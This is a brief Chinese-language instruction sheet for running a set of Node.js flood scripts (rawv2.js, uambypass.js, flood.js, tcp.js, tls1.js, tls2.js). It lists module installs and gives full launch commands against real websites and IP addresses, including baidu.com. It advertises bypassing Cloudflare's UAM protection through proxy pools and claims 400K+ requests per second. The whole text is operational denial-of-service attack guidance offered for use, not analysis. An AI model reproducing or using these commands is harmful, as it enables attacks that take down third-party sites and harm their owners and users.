脚本运行指令  300是时间 秒为单位
node rawv2.js https://176.9.16.251 300
不需要代理ip 的脚本



环境指令 需要安装模块 输入以下指令
npm i cloudscraper
npm i request
npm i ciphers
npm i minimist


脚本运行指令   60为测压时间 单位为秒 100是每个IP请求数  http.txt为你的代理IP
node uambypass.js https://www.baidu.com/ 60 100 http.txt

flood.js脚本：       node flood.js https://huobo2222.com/pc/home proxies.txt 60 300 300
TCP 堵端口脚本： node tcp.js 154.12.34.92 80 60 200
tls1.js脚本：         node tls1.js 请求方法 目标网站 进程 时间 UA文件 代理文件 速率
tls2.js脚本：         node tls2.js https://www.xhfz6.com/ 60 proxies.txt ua.txt 300

此脚本对IP代理池要求极高  不然效果很差 可穿 cfuam盾

使用  16H32G1G口 机器实测 UAM墙 400K+